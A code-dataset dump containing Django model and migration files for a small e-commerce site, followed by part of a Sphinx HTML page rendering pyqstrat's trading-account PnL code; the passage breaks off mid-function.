blank=True)\n\n def __str__(self):\n return self.name \n\nclass CartDetails(models.Model): \n id_cart = models.AutoField(primary_key=True)\n id_product = models.ForeignKey(Products,on_delete=models.CASCADE, null=True, blank=True)\n id_customer = models.ForeignKey(Customer,on_delete=models.CASCADE, null=True, blank=True)\n date_cart = models.DateTimeField(auto_now=True, null=True, blank=True)\n\n def int(self):\n return self.id_cart\n\nclass OrderDetails(models.Model):\n id_order = models.AutoField(primary_key=True)\n product_id = models.ForeignKey(Products,on_delete=models.CASCADE)\n customer_id = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)\n cart_id = models.ForeignKey(CartDetails,on_delete=models.CASCADE)\n total_items = models.CharField(max_length=120,null=True, blank=True)\n total_price = models.CharField(max_length=60,null=True, blank=True)\n date_ordered = models.DateTimeField(auto_now=True)\n\n \nclass ShippingDetails(models.Model):\n id_shipping = models.AutoField(primary_key=True)\n id_order_id = models.ForeignKey(OrderDetails,on_delete=models.CASCADE)\n phone_no = models.IntegerField(null=True, blank=True)\n door_no = models.CharField(max_length=120,null=True, blank=True)\n address = models.CharField(max_length=220,null=True, blank=True)\n city = models.CharField(max_length=220,null=True, blank=True)\n pincode = models.CharField(max_length=120,null=True, blank=True)\n\n\n\n \n\n" }, { "alpha_fraction": 0.5409663915634155, "alphanum_fraction": 0.5735294222831726, "avg_line_length": 27.84848403930664, "blob_id": "d640996d3eeb505f78a54e47bac09174a5082cba", "content_id": "002a96f23a51c31ee61cce37748a28031a52c30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "no_license", "max_line_length": 70, "num_lines": 33, "path": "/main/migrations/0005_auto_20210113_2133.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.5 on 2021-01-13 16:03\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0004_auto_20210103_1637'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='cartdetails',\n name='id_cart',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='orderdetails',\n name='id_order',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='shippingdetails',\n name='id_shipping',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='shippingdetails',\n name='phone_no',\n field=models.IntegerField(blank=True, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5646123290061951, "alphanum_fraction": 0.579948902130127, "avg_line_length": 41.93902587890625, "blob_id": "135c061eb6ed7dd46e2277279556decb0ecd7d10", "content_id": "33e3162c7ebca01db94a0f4d66ef724dde1afab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3521, "license_type": "no_license", "max_line_length": 125, "num_lines": 82, "path": "/main/migrations/0003_auto_20210103_1607.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.4 on 2021-01-03 10:37\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('main', '0002_products_slug'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CartDetails',\n fields=[\n ('id_cart', models.IntegerField(primary_key=True, serialize=False)),\n ('date_cart', models.DateTimeField(auto_now=True)),\n ('customer_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='OrderDetails',\n fields=[\n ('id_order', models.IntegerField(primary_key=True, serialize=False)),\n ('total_items', models.CharField(blank=True, max_length=120, null=True)),\n ('total_price', models.CharField(blank=True, max_length=60, null=True)),\n ('date_ordered', models.DateTimeField(auto_now=True)),\n ('cart_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.cartdetails')),\n ('customer_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterField(\n model_name='products',\n name='brand',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='category',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='color',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='name',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='slug',\n field=models.SlugField(blank=True, max_length=200, null=True, unique=True),\n ),\n migrations.CreateModel(\n name='ShippingDetails',\n fields=[\n ('id_shipping', models.IntegerField(primary_key=True, serialize=False)),\n ('phone_no', models.IntegerField(blank=True, max_length=120, null=True)),\n ('door_no', models.CharField(blank=True, max_length=120, null=True)),\n ('address', models.CharField(blank=True, max_length=220, null=True)),\n ('city', models.CharField(blank=True, max_length=220, null=True)),\n ('pincode', models.CharField(blank=True, max_length=120, null=True)),\n ('id_order_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.orderdetails')),\n ],\n ),\n migrations.AddField(\n model_name='orderdetails',\n name='product_id',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.products'),\n ),\n migrations.AddField(\n model_name='cartdetails',\n name='product_id',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.products'),\n ),\n ]\n" }, { "alpha_fraction": 0.4904943108558655, "alphanum_fraction": 0.5494296550750732, "avg_line_length": 21.869565963745117, "blob_id": "ae3d0eeb8c1c558fd2b09152a11afd298a5f4b9c", "content_id": "7c4605abd59a105a03d4a4c20cd981cc0030601f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "no_license", "max_line_length": 47, "num_lines": 23, "path": "/main/migrations/0004_auto_20210103_1637.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.4 on 2021-01-03 11:07\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0003_auto_20210103_1607'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='cartdetails',\n old_name='customer_id',\n new_name='id_customer',\n ),\n migrations.RenameField(\n model_name='cartdetails',\n old_name='product_id',\n new_name='id_product',\n ),\n ]\n" } ]
11
abbass2/pyqstrat
https://github.com/abbass2/pyqstrat
6c72ef6f43940f1705a86c6239d82689087ed9be
375b3ca802b914374fe1cb58d8ff167e9fa93674
50e0fd801ddb40c112fc5692f9eb9074692ce554
refs/heads/master
2023-05-02T04:10:31.379505
2023-04-21T21:19:53
2023-04-21T21:19:53
143,200,286
352
57
BSD-3-Clause
2018-08-01T19:35:41
2023-04-14T20:11:18
2023-04-17T18:52:34
Jupyter Notebook
[ { "alpha_fraction": 0.6007212400436401, "alphanum_fraction": 0.6111816763877869, "avg_line_length": 196.1466064453125, "blob_id": "423eb9237e192e91fe666dd3c445f9027b3cd212", "content_id": "aaf3dbd04f2eee931749c4a2f337fea19ccf756e", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 142537, "license_type": "permissive", "max_line_length": 962, "num_lines": 723, "path": "/docs/_modules/pyqstrat/account.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.account &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.account</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. Do not modify these</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">copy</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections</span> <span class=\"kn\">import</span> <span class=\"n\">defaultdict</span><span class=\"p\">,</span> <span class=\"n\">deque</span>\n<span class=\"kn\">from</span> <span class=\"nn\">sortedcontainers</span> <span class=\"kn\">import</span> <span class=\"n\">SortedDict</span>\n<span class=\"kn\">import</span> <span class=\"nn\">math</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_types</span> <span class=\"kn\">import</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">Trade</span><span class=\"p\">,</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">RoundTripTrade</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">assert_</span>\n<span class=\"kn\">from</span> <span class=\"nn\">types</span> <span class=\"kn\">import</span> <span class=\"n\">SimpleNamespace</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">Callable</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.compute_pnl</span> <span class=\"kn\">import</span> <span class=\"n\">calc_trade_pnl</span>\n\n<span class=\"n\">NAT</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;NaT&#39;</span><span class=\"p\">)</span>\n\n\n<div class=\"viewcode-block\" id=\"leading_nan_to_zero\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.leading_nan_to_zero\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">leading_nan_to_zero</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">columns</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"n\">column</span> <span class=\"ow\">in</span> <span class=\"n\">columns</span><span class=\"p\">:</span>\n <span class=\"n\">vals</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"n\">column</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">first_non_nan_index_</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ravel</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"o\">~</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">)))</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">first_non_nan_index_</span><span class=\"p\">):</span>\n <span class=\"n\">first_non_nan_index</span> <span class=\"o\">=</span> <span class=\"n\">first_non_nan_index_</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">first_non_nan_index</span> <span class=\"o\">=</span> <span class=\"o\">-</span><span class=\"mi\">1</span>\n\n <span class=\"k\">if</span> <span class=\"n\">first_non_nan_index</span> <span class=\"o\">&gt;</span> <span class=\"mi\">0</span> <span class=\"ow\">and</span> <span class=\"n\">first_non_nan_index</span> <span class=\"o\">&lt;</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">):</span>\n <span class=\"n\">vals</span><span class=\"p\">[:</span><span class=\"n\">first_non_nan_index</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan_to_num</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">[:</span><span class=\"n\">first_non_nan_index</span><span class=\"p\">])</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"n\">column</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">vals</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div>\n\n\n<div class=\"viewcode-block\" id=\"find_last_non_nan_index\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.find_last_non_nan_index\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">find_last_non_nan_index</span><span class=\"p\">(</span><span class=\"n\">array</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">int</span><span class=\"p\">:</span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">array</span><span class=\"p\">))[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">i</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"n\">i</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span>\n <span class=\"k\">return</span> <span class=\"mi\">0</span></div>\n\n\n<div class=\"viewcode-block\" id=\"find_index_before\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.find_index_before\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">find_index_before</span><span class=\"p\">(</span><span class=\"n\">sorted_dict</span><span class=\"p\">:</span> <span class=\"n\">SortedDict</span><span class=\"p\">,</span> <span class=\"n\">key</span><span class=\"p\">:</span> <span class=\"n\">Any</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">int</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Find index of the first key in a sorted dict that is less than or equal to the key passed in.</span>\n<span class=\"sd\"> If the key is less than the first key in the dict, return -1</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">size</span> <span class=\"o\">=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">sorted_dict</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">size</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"o\">-</span><span class=\"mi\">1</span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">sorted_dict</span><span class=\"o\">.</span><span class=\"n\">bisect_left</span><span class=\"p\">(</span><span class=\"n\">key</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">i</span> <span class=\"o\">==</span> <span class=\"n\">size</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"n\">size</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">if</span> <span class=\"n\">sorted_dict</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">()[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">!=</span> <span class=\"n\">key</span><span class=\"p\">:</span>\n <span class=\"k\">return</span> <span class=\"n\">i</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">return</span> <span class=\"n\">i</span></div>\n\n\n<div class=\"viewcode-block\" id=\"ContractPNL\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">ContractPNL</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Computes pnl for a single contract over time given trades and market data</span>\n<span class=\"sd\"> &gt;&gt;&gt; from pyqstrat.pq_types import MarketOrder</span>\n<span class=\"sd\"> &gt;&gt;&gt; ContractGroup.clear()</span>\n<span class=\"sd\"> &gt;&gt;&gt; Contract.clear()</span>\n<span class=\"sd\"> &gt;&gt;&gt; aapl_cg = ContractGroup.create(&#39;AAPL&#39;)</span>\n<span class=\"sd\"> &gt;&gt;&gt; aapl_contract = Contract.create(&#39;AAPL&#39;, contract_group=aapl_cg)</span>\n<span class=\"sd\"> &gt;&gt;&gt; timestamps = np.arange(np.datetime64(&#39;2018-01-01&#39;), np.datetime64(&#39;2018-01-04&#39;))</span>\n<span class=\"sd\"> &gt;&gt;&gt; def get_price(contract, timestamps, idx, strategy_context):</span>\n<span class=\"sd\"> ... assert contract.symbol == &#39;AAPL&#39;, f&#39;unknown contract: {contract}&#39;</span>\n<span class=\"sd\"> ... return idx + 10.1</span>\n\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl = ContractPNL(aapl_contract, timestamps, get_price, SimpleNamespace()) </span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_5 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], 20), timestamps[2], 10, 16.2)</span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_6 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], -20), timestamps[2], -10, 16.5)</span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_7 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], -20), timestamps[2], -10, 16.5)</span>\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl._add_trades([trade_5, trade_6])</span>\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl._add_trades([trade_7])</span>\n<span class=\"sd\"> &gt;&gt;&gt; df = contract_pnl.df()</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert (len(df == 1))</span>\n<span class=\"sd\"> &gt;&gt;&gt; row = df.iloc[0]</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert row.to_dict() == {&#39;symbol&#39;: &#39;AAPL&#39;,</span>\n<span class=\"sd\"> ... &#39;timestamp&#39;: pd.Timestamp(&#39;2018-01-03 00:00:00&#39;),</span>\n<span class=\"sd\"> ... &#39;position&#39;: -10,</span>\n<span class=\"sd\"> ... &#39;price&#39;: 12.1,</span>\n<span class=\"sd\"> ... &#39;unrealized&#39;: 44.0,</span>\n<span class=\"sd\"> ... &#39;realized&#39;: 3.000000000000007,</span>\n<span class=\"sd\"> ... &#39;commission&#39;: 0.0,</span>\n<span class=\"sd\"> ... &#39;fee&#39;: 0.0,</span>\n<span class=\"sd\"> ... &#39;net_pnl&#39;: 47.00000000000001}</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract</span><span class=\"p\">:</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> \n <span class=\"n\">account_timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> \n <span class=\"n\">price_function</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">],</span> <span class=\"nb\">float</span><span class=\"p\">],</span>\n <span class=\"n\">strategy_context</span><span class=\"p\">:</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span> <span class=\"o\">=</span> <span class=\"n\">contract</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span> <span class=\"o\">=</span> <span class=\"n\">price_function</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span> <span class=\"o\">=</span> <span class=\"n\">strategy_context</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">account_timestamps</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">SortedDict</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">SortedDict</span><span class=\"p\">()</span>\n <span class=\"c1\"># Store trades that are not offset so when new trades come in we can offset against these to calc pnl</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">int</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">False</span>\n \n <span class=\"k\">def</span> <span class=\"nf\">_add_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> trades: Must be sorted by timestamp</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">):</span>\n <span class=\"n\">prev_max_timestamp</span><span class=\"p\">,</span> <span class=\"n\">_</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">&gt;=</span> <span class=\"n\">prev_max_timestamp</span><span class=\"p\">,</span>\n <span class=\"sa\">f</span><span class=\"s1\">&#39;Trades can only be added with non-decreasing timestamps current: </span><span class=\"si\">{</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\"> prev max: </span><span class=\"si\">{</span><span class=\"n\">prev_max_timestamp</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"o\">=</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">True</span>\n \n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">):</span>\n <span class=\"n\">t_trades</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">trade</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">]</span>\n <span class=\"n\">open_qtys</span><span class=\"p\">,</span> <span class=\"n\">open_prices</span><span class=\"p\">,</span> <span class=\"n\">realized_chg</span> <span class=\"o\">=</span> <span class=\"n\">calc_trade_pnl</span><span class=\"p\">(</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span><span class=\"p\">,</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">],</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">int</span><span class=\"p\">),</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">],</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">),</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span><span class=\"p\">)</span>\n \n <span class=\"n\">open_qty</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">open_qtys</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">open_qty</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span>\n <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">open_qtys</span> <span class=\"o\">*</span> <span class=\"n\">open_prices</span><span class=\"p\">)</span> <span class=\"o\">/</span> <span class=\"n\">open_qty</span>\n \n <span 